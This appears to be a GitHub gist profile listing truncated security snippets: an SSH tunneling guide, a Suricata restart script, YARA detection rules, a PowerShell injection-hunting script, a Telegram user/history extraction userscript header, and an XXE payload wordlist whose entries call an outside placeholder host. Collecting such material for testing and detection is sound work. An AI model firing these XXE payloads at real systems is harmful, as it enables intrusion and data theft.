ACE Alchemy Cyberblaze acealchemycyberblaze

// ==UserScript==
// @name Telegram Script
// @author [email protected]
// @version 0.3
// @description Greasemonkey script to extract users/history
// @author You
// @downloadUrl https://gist.github.com/fabledowl/4d6f84b211a2918fb9ee9556550df5b0/raw/telegramScript.user.js
// @updateUrl https://gist.github.com/fabledowl/4d6f84b211a2918fb9ee9556550df5b0/raw/telegramScript.user.js
// @include https://web.telegram.org/*
// @grant none
acealchemycyberblaze / ssh_tunneling.md
Created March 27, 2022 10:59 — forked from ashrithr/ssh_tunneling.md
ssh tunneling and port forwarding

### Single hop tunneling:

ssh -f -N -L 9906:127.0.0.1:3306 [email protected]

where,

  • -f puts ssh in background
  • -N makes it not execute a remote command
acealchemycyberblaze / restartSuricata.sh
Created December 24, 2021 03:41 — forked from Bsebring/restartSuricata.sh
Restart Suricata conveniently in Daemon mode using this bash script
# Stop parent process (does not fully stop suricata)
service suricata stop
# Remove the pid file if it exists
FILE=/var/run/suricata.pid
if test -f "$FILE"; then
rm "$FILE"
fi
# Kill suricata by name to eliminate child processes and prevent old configurations from ran$
acealchemycyberblaze / xxe-payloads.txt
Created September 20, 2020 20:21 — forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y
acealchemycyberblaze / keybase.md
Created August 12, 2020 00:09
Keybase.io Proof

Keybase proof

I hereby claim:

  • I am cyb3rdo on github.
  • I am cyb3rdo (https://keybase.io/cyb3rdo) on keybase.
  • I have a public key ASDrlHa2GD5KAtdynNOjMKYXWeTAyHPaOtjjlmMz39pC3go

To claim this, I am signing this object:

acealchemycyberblaze / iddqd.yar
Created July 10, 2020 03:48 — forked from Neo23x0/iddqd.yar
IDDQD - Godmode YARA Rule
/*
_____ __ __ ___ __
/ ___/__ ___/ / / |/ /__ ___/ /__
/ (_ / _ \/ _ / / /|_/ / _ \/ _ / -_)
\___/\___/\_,_/_/_/__/_/\___/\_,_/\__/
\ \/ / _ | / _ \/ _ | / _ \__ __/ /__
\ / __ |/ , _/ __ | / , _/ // / / -_)
/_/_/ |_/_/|_/_/ |_| /_/|_|\_,_/_/\__/
Florian Roth - v0.5.0 October 2019
acealchemycyberblaze / XProtect.yara
Created July 8, 2020 05:20 — forked from pedramamini/XProtect.yara
Apple OSX built-in file defense is powered by YARA: /System/Library/CoreServices/XProtect.bundle/Contents/Resources
import "hash"
private rule Macho
{
meta:
description = "private rule to match Mach-O binaries"
condition:
uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca
}
acealchemycyberblaze / Get-InjectedThread.ps1
Created March 31, 2020 18:03 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
acealchemycyberblaze / url_parser.py
Last active March 19, 2020 19:03 — forked from 33sticks/url_parser.py
A Python script that takes a CSV file containing URLs, say from a web server log or an analytics platform, and parses the URLs into URL parts that are then appended to a data frame for further manipulation and/or data analysis.
#import urlparse to break url into components (in Python 3 it lives in urllib.parse)
from urllib.parse import urlparse
#import pandas for data processing
from pandas import DataFrame, Series
import pandas as pd
#import URL data
df = pd.read_csv("/Users/Documents/analysis/my_urls.csv")